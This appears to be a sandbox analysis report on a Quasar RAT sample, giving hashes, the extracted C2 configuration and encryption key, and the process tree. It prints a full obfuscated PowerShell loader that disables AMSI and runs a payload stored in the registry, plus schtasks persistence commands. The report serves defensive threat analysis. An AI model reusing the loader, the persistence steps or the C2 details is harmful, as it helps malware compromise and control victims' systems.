Analysis

  • max time kernel
    1800s
  • max time network
    1792s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
  • submitted
    02-05-2024 20:56

General

  • Target

    R0X-Built.exe

  • Size

    409KB

  • MD5

    a0f5aa5764c4f66eee82f857f9f447b6

  • SHA1

    3c3a780d020cb3eb3088223443fe813abb95dccd

  • SHA256

    43c6b9b6c241dbd6ad1bde7980026235373374d5e836fb6c794354a15e678ef3

  • SHA512

    458c03ae490e409598b8e9e89911b0757fb61411fbc45a60ecefed3c13d0fc96b7bc205afe1fb3e0f7585eb163f102754ec9259691eca1bfa00b028f74eb8384

  • SSDEEP

    6144:RMX2pJAJcC0B61K6qZ1fQ57P/EwXhb4azmosb+lfXdOIFyoOOfTA3pwF:lpyJcC+uK6qZ1G8QJjbfNOSOObA3pwF

Malware Config

Extracted

Family

quasar

Version

3.1.5

Botnet

Slave

C2

even-lemon.gl.at.ply.gg:33587

Mutex

$Sxr-3vDee7FzoJnhqjuE3n

Attributes
  • encryption_key

    KaNwItdY6wlv5nCN4prL

  • install_name

    $srr-powershell.exe

  • log_directory

    Logs

  • reconnect_delay

    1000

  • startup_key

    $srr-powershell

  • subdirectory

    Windows

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar payload 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Downloads MZ/PE file
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 14 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 60 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:560
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:1000
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{e6e0a8f8-27bd-4497-b403-30b327cc7118}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4768
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
          PID:640
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay
          1⤵
            PID:732
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k dcomlaunch -s LSM
            1⤵
              PID:912
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
              1⤵
                PID:436
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts
                1⤵
                  PID:752
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService
                  1⤵
                    PID:1032
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog
                    1⤵
                    • Drops file in System32 directory
                    PID:1096
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                    1⤵
                      PID:1128
                      • c:\windows\system32\taskhostw.exe
                        taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                        2⤵
                          PID:3236
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:DqOFfOUhWvuq{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$UDrOiMFysVQRDx,[Parameter(Position=1)][Type]$MjzeTYtYBN)$LUHNMsHYBnP=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+'e'+[Char](102)+''+[Char](108)+''+[Char](101)+''+'c'+''+[Char](116)+''+[Char](101)+''+[Char](100)+'D'+[Char](101)+''+'l'+''+'e'+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+''+[Char](77)+''+[Char](101)+''+[Char](109)+'o'+[Char](114)+''+[Char](121)+'M'+'o'+''+'d'+''+[Char](117)+''+[Char](108)+'e',$False).DefineType(''+[Char](77)+''+'y'+''+'D'+'el'+'e'+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+'e'+''+[Char](84)+''+[Char](121)+''+'p'+''+[Char](101)+'',''+[Char](67)+''+'l'+''+[Char](97)+'s'+[Char](115)+''+[Char](44)+''+[Char](80)+''+'u'+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](101)+'a'+'l'+''+[Char](101)+''+[Char](100)+''+[Char](44)+''+[Char](65)+''+[Char](110)+''+[Char](115)+'i'+[Char](67)+''+[Char](108)+'a'+'s'+''+[Char](115)+','+[Char](65)+''+[Char](117)+'t'+'o'+''+'C'+''+[Char](108)+''+'a'+''+[Char](115)+''+'s'+'',[MulticastDelegate]);$LUHNMsHYBnP.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+''+[Char](112)+'e'+[Char](99)+'ia'+[Char](108)+''+[Char](78)+''+[Char](97)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](72)+'id'+'e'+''+'B'+'y'+[Char](83)+'i'+[Char](103)+''+','+''+[Char](80)+'u'+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$UDrOiMFysVQRDx).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+'i'+''+[Char](109)+''+[Char](101)+','+[Char](77)+''+[Char](97)+''+'n'+''+'a'+'ge'+[Char](100)+'');$LUHNMsHYBnP.DefineMethod(''+'I'+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+[Char](117)+''+[Char](98)+'l'+'i'+''+[Char](99)+''+[Char](44)+'H'+'i'+''+[Char](100)+''+'e'+'B'+'y'+''+[Char](83)+'ig,'+'N'+''+[Char](101)+'w'+'S'+''+'l'+''+[Char](111)+''+'t'+','+[Char](86)+''+'i'+''+'r'+''+'t'+''+[Char](117)+''+[Char](97)+''+[Char](108)+'',$MjzeTYtYBN,$UDrOiMFysVQRDx).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+'e'+[Char](44)+''+[Char](77)+'a'+[Char](110)+''+'a'+''+[Char](103)+''+'e'+'d');Write-Output $LUHNMsHYBnP.CreateType();}$zzNTdadAPhBst=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+'yst'+[Char](101)+''+[Char](109)+''+[Char](46)+''+'d'+''+'l'+''+[Char](108)+'')}).GetType(''+'M'+''+[Char](105)+''+'c'+''+'r'+'o'+[Char](115)+''+'o'+''+'f'+''+'t'+''+[Char](46)+'Wi'+[Char](110)+''+'3'+''+[Char](50)+'.'+'U'+''+[Char](110)+'s'+[Char](97)+'f'+[Char](101)+''+[Char](78)+''+'a'+''+[Char](116)+''+[Char](105)+'v'+[Char](101)+''+[Char](77)+'e'+[Char](116)+'h'+[Char](111)+''+[Char](100)+''+'s'+'');$mskGrCHTuLJPUG=$zzNTdadAPhBst.GetMethod(''+[Char](71)+'e'+'t'+''+'P'+'r'+[Char](111)+'c'+[Char](65)+''+[Char](100)+''+'d'+''+[Char](114)+'es'+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+'b'+''+'l'+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+'t'+'a'+''+[Char](116)+''+'i'+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$HyeQqMAJDhwRErxeGtc=DqOFfOUhWvuq @([String])([IntPtr]);$wRyyXxhmEyJriwNSsVLxKj=DqOFfOUhWvuq @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$deySvSlbbQi=$zzNTdadAPhBst.GetMethod(''+[Char](71)+''+[Char](101)+'t'+[Char](77)+''+'o'+'du'+'l'+''+'e'+''+[Char](72)+''+'a'+'nd'+'l'+'e').Invoke($Null,@([Object](''+'k'+''+'e'+''+[Char](114)+''+[Char](110)+''+[Char](101)+'l'+[Char](51)+''+[Char](50)+'.'+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$EMBkquRvXJbxue=$mskGrCHTuLJPUG.Invoke($Null,@([Object]$deySvSlbbQi,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+''+[Char](100)+'L'+[Char](105)+''+'b'+''+'r'+''+[Char](97)+''+[Char](114)+''+[Char](121)+''+[Char](65)+'')));$tiELPUiydGhPRuNmd=$mskGrCHTuLJPUG.Invoke($Null,@([Object]$deySvSlbbQi,[Object](''+'V'+''+[Char](105)+''+'r'+'t'+[Char](117)+''+'a'+'l'+[Char](80)+'ro'+[Char](116)+''+'e'+'c'+[Char](116)+'')));$JdDcmIf=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($EMBkquRvXJbxue,$HyeQqMAJDhwRErxeGtc).Invoke(''+[Char](97)+''+[Char](109)+'s'+[Char](105)+'.d'+'l'+''+'l'+'');$DdOOsERLYoMLSlWjl=$mskGrCHTuLJPUG.Invoke($Null,@([Object]$JdDcmIf,[Object](''+'A'+''+'m'+''+'s'+''+[Char](105)+''+[Char](83)+''+[Char](99)+'an'+'B'+''+[Char](117)+''+[Char](102)+''+[Char](102)+'er')));$lXZOatbpsT=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($tiELPUiydGhPRuNmd,$wRyyXxhmEyJriwNSsVLxKj).Invoke($DdOOsERLYoMLSlWjl,[uint32]8,4,[ref]$lXZOatbpsT);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$DdOOsERLYoMLSlWjl,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($tiELPUiydGhPRuNmd,$wRyyXxhmEyJriwNSsVLxKj).Invoke($DdOOsERLYoMLSlWjl,[uint32]8,0x20,[ref]$lXZOatbpsT);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'OF'+[Char](84)+'WA'+[Char](82)+'E').GetValue(''+'$'+'7'+[Char](55)+''+[Char](115)+''+'t'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
                          2⤵
                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                          • Drops file in System32 directory
                          • Suspicious use of SetThreadContext
                          • Modifies data under HKEY_USERS
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:2720
                      • c:\windows\system32\svchost.exe
                        c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                        1⤵
                          PID:1204
                        • c:\windows\system32\svchost.exe
                          c:\windows\system32\svchost.exe -k localservice -s nsi
                          1⤵
                            PID:1212
                          • c:\windows\system32\svchost.exe
                            c:\windows\system32\svchost.exe -k localservice -s EventSystem
                            1⤵
                              PID:1268
                            • c:\windows\system32\svchost.exe
                              c:\windows\system32\svchost.exe -k netsvcs -s Themes
                              1⤵
                                PID:1280
                              • c:\windows\system32\svchost.exe
                                c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp
                                1⤵
                                  PID:1412
                                • c:\windows\system32\svchost.exe
                                  c:\windows\system32\svchost.exe -k netsvcs -s SENS
                                  1⤵
                                    PID:1420
                                  • c:\windows\system32\svchost.exe
                                    c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                                    1⤵
                                      PID:1488
                                      • c:\windows\system32\sihost.exe
                                        sihost.exe
                                        2⤵
                                          PID:3148
                                      • c:\windows\system32\svchost.exe
                                        c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder
                                        1⤵
                                          PID:1496
                                        • c:\windows\system32\svchost.exe
                                          c:\windows\system32\svchost.exe -k networkservice -s NlaSvc
                                          1⤵
                                            PID:1580
                                          • c:\windows\system32\svchost.exe
                                            c:\windows\system32\svchost.exe -k networkservice -s Dnscache
                                            1⤵
                                              PID:1596
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
                                              1⤵
                                                PID:1652
                                              • c:\windows\system32\svchost.exe
                                                c:\windows\system32\svchost.exe -k localservice -s netprofm
                                                1⤵
                                                  PID:1708
                                                • C:\Windows\system32\svchost.exe
                                                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted
                                                  1⤵
                                                    PID:1720
                                                  • C:\Windows\System32\svchost.exe
                                                    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
                                                    1⤵
                                                      PID:1740
                                                    • c:\windows\system32\svchost.exe
                                                      c:\windows\system32\svchost.exe -k appmodel -s StateRepository
                                                      1⤵
                                                        PID:1864
                                                      • c:\windows\system32\svchost.exe
                                                        c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                                                        1⤵
                                                          PID:1872
                                                        • C:\Windows\System32\spoolsv.exe
                                                          C:\Windows\System32\spoolsv.exe
                                                          1⤵
                                                            PID:2020
                                                          • c:\windows\system32\svchost.exe
                                                            c:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation
                                                            1⤵
                                                              PID:2096
                                                            • c:\windows\system32\svchost.exe
                                                              c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
                                                              1⤵
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:2144
                                                            • c:\windows\system32\svchost.exe
                                                              c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
                                                              1⤵
                                                                PID:2432
                                                              • c:\windows\system32\svchost.exe
                                                                c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
                                                                1⤵
                                                                  PID:2440
                                                                • c:\windows\system32\svchost.exe
                                                                  c:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent
                                                                  1⤵
                                                                    PID:2472
                                                                  • c:\windows\system32\svchost.exe
                                                                    c:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc
                                                                    1⤵
                                                                      PID:2492
                                                                    • C:\Windows\sysmon.exe
                                                                      C:\Windows\sysmon.exe
                                                                      1⤵
                                                                        PID:2600
                                                                      • c:\windows\system32\svchost.exe
                                                                        c:\windows\system32\svchost.exe -k networkservice -s CryptSvc
                                                                        1⤵
                                                                        • Drops file in System32 directory
                                                                        • Modifies data under HKEY_USERS
                                                                        PID:2632
                                                                      • c:\windows\system32\svchost.exe
                                                                        c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks
                                                                        1⤵
                                                                          PID:2648
                                                                        • c:\windows\system32\svchost.exe
                                                                          c:\windows\system32\svchost.exe -k netsvcs -s WpnService
                                                                          1⤵
                                                                            PID:2700
                                                                          • c:\windows\system32\svchost.exe
                                                                            c:\windows\system32\svchost.exe -k netsvcs -s Browser
                                                                            1⤵
                                                                              PID:2784
                                                                            • C:\Windows\system32\wbem\unsecapp.exe
                                                                              C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                              1⤵
                                                                                PID:2928
                                                                              • c:\windows\system32\svchost.exe
                                                                                c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
                                                                                1⤵
                                                                                  PID:3172
                                                                                • c:\windows\system32\svchost.exe
                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s TokenBroker
                                                                                  1⤵
                                                                                    PID:3280
                                                                                  • C:\Windows\Explorer.EXE
                                                                                    C:\Windows\Explorer.EXE
                                                                                    1⤵
                                                                                      PID:3432
                                                                                      • C:\Users\Admin\AppData\Local\Temp\R0X-Built.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\R0X-Built.exe"
                                                                                        2⤵
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        • Suspicious use of WriteProcessMemory
                                                                                        PID:2384
                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                          "schtasks" /create /tn "$srr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\R0X-Built.exe" /rl HIGHEST /f
                                                                                          3⤵
                                                                                          • Creates scheduled task(s)
                                                                                          PID:4496
                                                                                        • C:\Users\Admin\AppData\Roaming\Windows\$srr-powershell.exe
                                                                                          "C:\Users\Admin\AppData\Roaming\Windows\$srr-powershell.exe"
                                                                                          3⤵
                                                                                          • Executes dropped EXE
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          • Suspicious use of WriteProcessMemory
                                                                                          PID:5000
                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                            "schtasks" /create /tn "$srr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Windows\$srr-powershell.exe" /rl HIGHEST /f
                                                                                            4⤵
                                                                                            • Creates scheduled task(s)
                                                                                            PID:804
                                                                                        • C:\Users\Admin\AppData\Local\Temp\install.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\install.exe"
                                                                                          3⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:3796
                                                                                        • C:\Windows\SysWOW64\SCHTASKS.exe
                                                                                          "SCHTASKS.exe" /create /tn "$77R0X-Built.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\R0X-Built.exe'" /sc onlogon /rl HIGHEST
                                                                                          3⤵
                                                                                          • Creates scheduled task(s)
                                                                                          PID:3140
                                                                                    • C:\Windows\System32\RuntimeBroker.exe
                                                                                      C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                      1⤵
                                                                                        PID:3960
                                                                                      • C:\Windows\system32\DllHost.exe
                                                                                        C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                        1⤵
                                                                                          PID:964
                                                                                        • c:\windows\system32\svchost.exe
                                                                                          c:\windows\system32\svchost.exe -k localservice -s CDPSvc
                                                                                          1⤵
                                                                                            PID:4700
                                                                                          • c:\windows\system32\svchost.exe
                                                                                            c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV
                                                                                            1⤵
                                                                                              PID:3792
                                                                                            • C:\Windows\system32\svchost.exe
                                                                                              C:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc
                                                                                              1⤵
                                                                                              • Modifies data under HKEY_USERS
                                                                                              PID:4328
                                                                                            • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                              "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                              1⤵
                                                                                              • Drops file in System32 directory
                                                                                              • Modifies data under HKEY_USERS
                                                                                              PID:2796
                                                                                            • c:\windows\system32\svchost.exe
                                                                                              c:\windows\system32\svchost.exe -k netsvcs -s wlidsvc
                                                                                              1⤵
                                                                                                PID:4984
                                                                                              • C:\Windows\system32\DllHost.exe
                                                                                                C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                1⤵
                                                                                                  PID:4208
                                                                                                • C:\Windows\system32\ApplicationFrameHost.exe
                                                                                                  C:\Windows\system32\ApplicationFrameHost.exe -Embedding
                                                                                                  1⤵
                                                                                                    PID:2956
                                                                                                  • C:\Windows\System32\InstallAgent.exe
                                                                                                    C:\Windows\System32\InstallAgent.exe -Embedding
                                                                                                    1⤵
                                                                                                      PID:3616
                                                                                                    • C:\Windows\system32\DllHost.exe
                                                                                                      C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
                                                                                                      1⤵
                                                                                                        PID:2464
                                                                                                      • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                        C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                        1⤵
                                                                                                        • Checks BIOS information in registry
                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                        PID:4492

                                                                                                      Network

                                                                                                      MITRE ATT&CK Enterprise v15

                                                                                                      Replay Monitor

                                                                                                      Loading Replay Monitor...

                                                                                                      Downloads

                                                                                                      • C:\Users\Admin\AppData\Local\Temp\install.exe
                                                                                                        Filesize

                                                                                                        162KB

                                                                                                        MD5

                                                                                                        152e3f07bbaf88fb8b097ba05a60df6e

                                                                                                        SHA1

                                                                                                        c4638921bb140e7b6a722d7c4d88afa7ed4e55c8

                                                                                                        SHA256

                                                                                                        a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc

                                                                                                        SHA512

                                                                                                        2fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4

                                                                                                      • C:\Users\Admin\AppData\Roaming\Windows\$srr-powershell.exe
                                                                                                        Filesize

                                                                                                        409KB

                                                                                                        MD5

                                                                                                        a0f5aa5764c4f66eee82f857f9f447b6

                                                                                                        SHA1

                                                                                                        3c3a780d020cb3eb3088223443fe813abb95dccd

                                                                                                        SHA256

                                                                                                        43c6b9b6c241dbd6ad1bde7980026235373374d5e836fb6c794354a15e678ef3

                                                                                                        SHA512

                                                                                                        458c03ae490e409598b8e9e89911b0757fb61411fbc45a60ecefed3c13d0fc96b7bc205afe1fb3e0f7585eb163f102754ec9259691eca1bfa00b028f74eb8384

                                                                                                      • C:\Windows\Temp\__PSScriptPolicyTest_2sgwe2f3.dfj.ps1
                                                                                                        Filesize

                                                                                                        1B

                                                                                                        MD5

                                                                                                        c4ca4238a0b923820dcc509a6f75849b

                                                                                                        SHA1

                                                                                                        356a192b7913b04c54574d18c28d46e6395428ab

                                                                                                        SHA256

                                                                                                        6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

                                                                                                        SHA512

                                                                                                        4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

                                                                                                      • C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157
                                                                                                        Filesize

                                                                                                        302B

                                                                                                        MD5

                                                                                                        ac312976f6538669ae3d2afa02abb713

                                                                                                        SHA1

                                                                                                        307b12f349664d0e9dc546a25cb928936dfd6f01

                                                                                                        SHA256

                                                                                                        38165d5aaf09e111a099d986c666571c4a5db0371e079f1be37815e9609de85f

                                                                                                        SHA512

                                                                                                        1fc5a96a4f19d1b9b28a7c541707c66d8d335ff9a995ef2e8b05952a36c6868b31a2516c101ae04efe9f8b4dfe817c8fd962ac7db687f6fac26867abff140757

                                                                                                      • C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9
                                                                                                        Filesize

                                                                                                        420B

                                                                                                        MD5

                                                                                                        30335539b4e17f9ed08d8c428fc3a518

                                                                                                        SHA1

                                                                                                        337de5f68d196dbfca95c489a2a50726f7fc2b59

                                                                                                        SHA256

                                                                                                        0c7baf5e9ee4ce8f161d1011ae4abf315832297406bc5db598899fad7b6fe348

                                                                                                        SHA512

                                                                                                        7006fd74e2efb53ffaa4729856f92260a6daa411ba13b61368cd4a28977d99c378b65fa1d5894fe29b54d27e061e647450a7ce219ffb84382107bfb59cb33ecd

                                                                                                      • memory/560-64-0x0000023C96CB0000-0x0000023C96CD5000-memory.dmp
                                                                                                        Filesize

                                                                                                        148KB

                                                                                                      • memory/560-66-0x0000023C96CE0000-0x0000023C96D0B000-memory.dmp
                                                                                                        Filesize

                                                                                                        172KB

                                                                                                      • memory/560-72-0x0000023C96CE0000-0x0000023C96D0B000-memory.dmp
                                                                                                        Filesize

                                                                                                        172KB

                                                                                                      • memory/560-73-0x00007FF976DC0000-0x00007FF976DD0000-memory.dmp
                                                                                                        Filesize

                                                                                                        64KB

                                                                                                      • memory/560-65-0x0000023C96CE0000-0x0000023C96D0B000-memory.dmp
                                                                                                        Filesize

                                                                                                        172KB

                                                                                                      • memory/640-86-0x00007FF976DC0000-0x00007FF976DD0000-memory.dmp
                                                                                                        Filesize

                                                                                                        64KB

                                                                                                      • memory/640-79-0x00000256C4F30000-0x00000256C4F5B000-memory.dmp
                                                                                                        Filesize

                                                                                                        172KB

                                                                                                      • memory/640-85-0x00000256C4F30000-0x00000256C4F5B000-memory.dmp
                                                                                                        Filesize

                                                                                                        172KB

                                                                                                      • memory/732-95-0x00007FF976DC0000-0x00007FF976DD0000-memory.dmp
                                                                                                        Filesize

                                                                                                        64KB

                                                                                                      • memory/732-88-0x000002458DFF0000-0x000002458E01B000-memory.dmp
                                                                                                        Filesize

                                                                                                        172KB

                                                                                                      • memory/732-94-0x000002458DFF0000-0x000002458E01B000-memory.dmp
                                                                                                        Filesize

                                                                                                        172KB

                                                                                                      • memory/912-99-0x000002314E4D0000-0x000002314E4FB000-memory.dmp
                                                                                                        Filesize

                                                                                                        172KB

                                                                                                      • memory/912-105-0x000002314E4D0000-0x000002314E4FB000-memory.dmp
                                                                                                        Filesize

                                                                                                        172KB

                                                                                                      • memory/912-106-0x00007FF976DC0000-0x00007FF976DD0000-memory.dmp
                                                                                                        Filesize

                                                                                                        64KB

                                                                                                      • memory/1000-110-0x000002A1ED7A0000-0x000002A1ED7CB000-memory.dmp
                                                                                                        Filesize

                                                                                                        172KB

                                                                                                      • memory/2384-5-0x0000000004940000-0x00000000049A6000-memory.dmp
                                                                                                        Filesize

                                                                                                        408KB

                                                                                                      • memory/2384-0-0x0000000073D5E000-0x0000000073D5F000-memory.dmp
                                                                                                        Filesize

                                                                                                        4KB

                                                                                                      • memory/2384-1-0x0000000000050000-0x00000000000BC000-memory.dmp
                                                                                                        Filesize

                                                                                                        432KB

                                                                                                      • memory/2384-2-0x0000000004DA0000-0x000000000529E000-memory.dmp
                                                                                                        Filesize

                                                                                                        5.0MB

                                                                                                      • memory/2384-20-0x0000000073D50000-0x000000007443E000-memory.dmp
                                                                                                        Filesize

                                                                                                        6.9MB

                                                                                                      • memory/2384-3-0x00000000049E0000-0x0000000004A72000-memory.dmp
                                                                                                        Filesize

                                                                                                        584KB

                                                                                                      • memory/2384-4-0x0000000073D50000-0x000000007443E000-memory.dmp
                                                                                                        Filesize

                                                                                                        6.9MB

                                                                                                      • memory/2384-7-0x0000000005970000-0x00000000059AE000-memory.dmp
                                                                                                        Filesize

                                                                                                        248KB

                                                                                                      • memory/2384-6-0x0000000004D80000-0x0000000004D92000-memory.dmp
                                                                                                        Filesize

                                                                                                        72KB

                                                                                                      • memory/2720-25-0x000001FC6B270000-0x000001FC6B292000-memory.dmp
                                                                                                        Filesize

                                                                                                        136KB

                                                                                                      • memory/2720-48-0x00007FF9B6D30000-0x00007FF9B6F0B000-memory.dmp
                                                                                                        Filesize

                                                                                                        1.9MB

                                                                                                      • memory/2720-47-0x000001FC6B410000-0x000001FC6B43A000-memory.dmp
                                                                                                        Filesize

                                                                                                        168KB

                                                                                                      • memory/2720-28-0x000001FC6B450000-0x000001FC6B4C6000-memory.dmp
                                                                                                        Filesize

                                                                                                        472KB

                                                                                                      • memory/2720-49-0x00007FF9B47B0000-0x00007FF9B485E000-memory.dmp
                                                                                                        Filesize

                                                                                                        696KB

                                                                                                      • memory/4768-51-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                        Filesize

                                                                                                        32KB

                                                                                                      • memory/4768-55-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                        Filesize

                                                                                                        32KB

                                                                                                      • memory/4768-57-0x00007FF9B47B0000-0x00007FF9B485E000-memory.dmp
                                                                                                        Filesize

                                                                                                        696KB

                                                                                                      • memory/4768-56-0x00007FF9B6D30000-0x00007FF9B6F0B000-memory.dmp
                                                                                                        Filesize

                                                                                                        1.9MB

                                                                                                      • memory/4768-50-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                        Filesize

                                                                                                        32KB

                                                                                                      • memory/4768-61-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                        Filesize

                                                                                                        32KB

                                                                                                      • memory/4768-52-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                        Filesize

                                                                                                        32KB

                                                                                                      • memory/4768-53-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                        Filesize

                                                                                                        32KB

                                                                                                      • memory/5000-13-0x0000000073D50000-0x000000007443E000-memory.dmp
                                                                                                        Filesize

                                                                                                        6.9MB

                                                                                                      • memory/5000-14-0x0000000073D50000-0x000000007443E000-memory.dmp
                                                                                                        Filesize

                                                                                                        6.9MB

                                                                                                      • memory/5000-671-0x0000000073D50000-0x000000007443E000-memory.dmp
                                                                                                        Filesize

                                                                                                        6.9MB

